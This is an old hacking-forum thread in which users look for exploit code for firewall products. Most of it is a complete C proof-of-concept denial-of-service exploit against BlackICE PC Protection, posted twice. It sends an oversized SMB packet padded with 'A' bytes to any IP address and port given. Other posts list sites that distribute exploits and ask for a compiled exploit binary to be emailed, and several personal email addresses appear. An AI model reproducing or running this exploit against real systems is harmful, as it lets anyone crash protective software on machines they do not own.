SecureD
Feb 24 2004, 11:12 AM
ZoneAlarm 4.x SMTP Processing Buffer Overflow Vulnerability somebody got the code already so i can try to compile! 
invisible-boy
Feb 24 2004, 01:14 PM
me2 but send source code here,it's easy (compile)
sp00geD
Feb 25 2004, 11:14 PM
i think hxxp://www.k-oitk.com has it
starter
Feb 26 2004, 03:39 PM
h**p://www.k-otik.net
this link should work
R0x0r
Feb 26 2004, 03:54 PM
Doesn't work for me... The site.
DaClueless
Mar 5 2004, 07:49 AM
| QUOTE (R0x0r @ Feb 26 2004, 03:54 PM) | | Doesn't work for me... The site. |
Here is a DOS version:
| CODE | /* RS/BlackICE SMB Processing Overflow Vulnerability */
/* PoC - DOS @ 'BlackICE PC Protection 3.6 ccb' */
/* happy coding - wanted_bsd_but_just_got_@linuxmail.org */
/* */
/* ...code by aZZe */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char smbxreq[] = {
0x00, 0x00, 0x01, 0x79, 0xff, 0x53, 0x4d, 0x42,
0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
0xff, 0xff, 0x01, 0x00, 0x0d, 0xff, 0x00, 0x00,
0x00, 0x04, 0x11, 0x0a, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c,
0x01, 0x42, 0x42,
/* 300 byte */
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x00,
0x54, 0x48, 0x41, 0x4e, 0x4b, 0x00, 0x59, 0x4f,
0x55, 0x00, 0x49, 0x53, 0x53, 0x00
};
int main(int clac, char *cla[])
{
int sd,x;
struct sockaddr_in ad;
if(clac<2){ printf("%s: <ip> <port>\n",cla[0]); return 0; }
ad.sin_addr.s_addr=inet_addr(cla[1]);
ad.sin_port=htons(atoi(cla[2]));
ad.sin_family=2;
sd=socket(2, 1, 0);if(!sd) printf("no socks\n");
if(connect(sd,(const struct sockaddr *)&ad,sizeof(ad))!=0)
printf("no connection\n");
if((x=send(sd,smbxreq,381,0))<0) {
printf("no sending\n");
}
printf("%d bytes on their way to freedom...\n",x);
close (sd);
return 0;
}
/* EOF biceZZ.c */
|
guufa
Mar 5 2004, 07:49 PM
| QUOTE (niemic @ Mar 5 2004, 07:49 AM) | | CODE | /* RS/BlackICE SMB Processing Overflow Vulnerability */
/* PoC - DOS @ 'BlackICE PC Protection 3.6 ccb' */
/* happy coding - wanted_bsd_but_just_got_@linuxmail.org */
/* */
/* ...code by aZZe */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char smbxreq[] = {
0x00, 0x00, 0x01, 0x79, 0xff, 0x53, 0x4d, 0x42,
0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
0xff, 0xff, 0x01, 0x00, 0x0d, 0xff, 0x00, 0x00,
0x00, 0x04, 0x11, 0x0a, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c,
0x01, 0x42, 0x42,
/* 300 byte */
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x00,
0x54, 0x48, 0x41, 0x4e, 0x4b, 0x00, 0x59, 0x4f,
0x55, 0x00, 0x49, 0x53, 0x53, 0x00
};
int main(int clac, char *cla[])
{
int sd,x;
struct sockaddr_in ad;
if(clac<2){ printf("%s: <ip> <port>\n",cla[0]); return 0; }
ad.sin_addr.s_addr=inet_addr(cla[1]);
ad.sin_port=htons(atoi(cla[2]));
ad.sin_family=2;
sd=socket(2, 1, 0);if(!sd) printf("no socks\n");
if(connect(sd,(const struct sockaddr *)&ad,sizeof(ad))!=0)
printf("no connection\n");
if((x=send(sd,smbxreq,381,0))<0) {
printf("no sending\n");
}
printf("%d bytes on their way to freedom...\n",x);
close (sd);
return 0;
}
/* EOF biceZZ.c */
|
|
This is code is for BlackIce exploit, the researched is ZoneAlarm 4.x SMTP Processing Buffer Overflow Vulnerability.
supermax
Mar 8 2004, 08:19 PM
Well is k-optik don't ahve it may be on securityfocus.com or jsut look using google
there is a lsit of site when u can find exploit...
hxxp://www.illmob.org/0day/
hxxp://fux0r.phathookups.com/incoming/
hxxp://members.lycos.co.uk/r34ct/
hxxp://www.w00w00.org/files/
hxxp://www.phreak.org/archives/exploits/
hxxp://www.anyside.com/exploits/remote/leak-sploit.c
hxxp://x82.inetcop.org/h0me/c0de/
hxxp://0days.tk/
zola
Mar 9 2004, 05:56 AM
 anyone know how i can get jill.exe . i tried to compile jill.c numerous ways, from borland, vc++ to emac, but the linux application can't run on windows except i format the diskette. it works for office writer but i had not test on application. i also tried to download devc++ but the file is too big and my computer slowing down.
jtevermore
Mar 9 2004, 07:52 AM
zola,
just give me a place i can send it, i get it to you
zola
Apr 9 2004, 12:41 AM
jvetermore, you are really something.
you can send it through my e-mail, zol@chelsea-mad.co.uk
i hope i can pay you back
greatdane
Apr 25 2005, 09:47 AM
QUOTE(jtevermore @ Mar 9 2004, 07:52 AM) zola, just give me a place i can send it, i get it to you could u pleace send jill.exe to me to plz, greatdane4k@yahoo.com every time i try to compile, no works 
EviL
Apr 25 2005, 10:26 AM
QUOTE(jtevermore @ Mar 9 2004, 07:52 AM) zola, just give me a place i can send it, i get it to you can u sent me too pliz?  fede.suxac@gmail.com tnx 
vnet576
Apr 25 2005, 02:43 PM
Whats this with people posting their emails to get compiled code? Thats not what this board is about. If you have problems compiling code then post what line the compiler is giving you errors with. Don't blatantly request the exe and ask people to mail it to you. Those who requested and posted their email email addresses will get a warning point. If anyone posts the compiled exe in this topic, they will recieve 2 warning points. 
toe
Apr 30 2005, 05:20 AM
ok ive got a problem. Dev C++ latest version i getogn the error:
unrecognized command line option "-fdollar-in-identifiers"
its crap and really anoying.
-toe
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
